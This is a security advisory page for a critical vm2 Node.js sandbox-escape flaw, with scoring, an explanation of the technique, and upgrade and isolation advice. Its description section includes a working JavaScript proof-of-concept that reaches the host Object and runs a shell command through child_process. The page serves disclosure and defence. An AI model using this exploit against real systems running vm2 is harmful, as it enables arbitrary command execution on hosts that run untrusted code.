Skip to main content

vm2 CVE-2026-43997

CRITICAL
Code Injection (CWE-94)
2026-05-07 https://github.com/patriksimek/vm2 GHSA-47x8-96vw-5wg6
10.0
CVSS 3.1 · Vendor: https://github.com/patriksimek/vm2
Share

Severity by source

Vendor (https://github.com/patriksimek/vm2) PRIMARY
10.0 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Red Hat
10.0 HIGH
qualitative

Primary rating from Vendor (https://github.com/patriksimek/vm2).

CVSS VectorVendor: https://github.com/patriksimek/vm2

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
May 07, 2026 - 04:31 vuln.today
Analysis Generated
May 07, 2026 - 04:31 vuln.today
CVE Published
May 07, 2026 - 04:00 nvd
CRITICAL 10.0

DescriptionCVE.org

Summary

It is possible to obtain the host Object, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.

Details

There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom)

PoC

js
const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);

const obj = {
	[sym]: (depth, opt, inspect) => {
		inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
	},
	valueOf: undefined,
	constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});

Impact

Sandbox Escape -> RCE

AnalysisAI

Remote code execution in vm2 Node.js sandbox library (versions ≤3.10.5) allows attackers to escape isolation and execute arbitrary system commands by exploiting incomplete host Object protections. Attackers leverage JavaScript prototype chain manipulation to obtain host-context symbols, enabling injection of malicious code into Node.js inspection routines. Publicly available exploit code exists with working proof-of-concept demonstrating command execution via child_process. CVSS 10.0 (Critical) with network attack vector and no authentication required. Fixed in vm2 3.11.0, part of coordinated release addressing 13 sandbox-escape vulnerabilities.

Technical ContextAI

vm2 is a popular Node.js sandboxing library (npm package) designed to execute untrusted JavaScript in isolated contexts. This vulnerability (CWE-94: Improper Control of Generation of Code) exploits JavaScript's prototype chain and symbol system to break context isolation. The attack chains __lookupGetter__, Buffer.apply methods, and prototype traversal to obtain the host environment's Object constructor. Once the host Object is accessible, attackers extract internal Node.js symbols like Symbol(nodejs.util.inspect.custom) using getOwnPropertySymbols. By overriding the inspection symbol on a crafted object and passing it to WebAssembly.compileStreaming (which triggers util.inspect error handling), the attacker's function executes with host-context privileges, gaining access to process.getBuiltinModule and child_process for arbitrary command execution. Previous protections in commit ebcfe94ad2f864f0bc35e78cff1d921107cfd160 attempted to restrict host Object access but left multiple bypass paths. The NPM package identifier is pkg:npm/vm2.

RemediationAI

Upgrade vm2 to version 3.11.0 or later immediately, per GitHub release notes at https://github.com/patriksimek/vm2/releases/tag/v3.11.0. This coordinated security release addresses 13 sandbox-escape vulnerabilities including this cross-realm symbol extraction issue. Update NPM dependency with 'npm install vm2@3.11.0' or update package.json to specify '"vm2": "^3.11.0"' and run npm update. For environments unable to upgrade immediately, implement strict network isolation around vm2 execution contexts using OS-level containerization (Docker with --network=none, gVisor, Firecracker) to limit post-exploitation impact-however, this only mitigates RCE consequences and does not prevent sandbox escape. Alternative: migrate to isolated-vm (https://github.com/laverdet/isolated-vm) which uses V8 isolates rather than context-based sandboxing, though this requires code refactoring and has different performance characteristics. The new bufferAllocLimit option in 3.11.0 also addresses heap exhaustion DoS vectors (GHSA-6785-pvv7-mvg7). Organizations should audit all deployments accepting untruated code and prioritize upgrade testing, as the 3.11.0 release maintains API compatibility with no breaking changes to existing public surface.

Vendor StatusVendor

Share

CVE-2026-43997 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy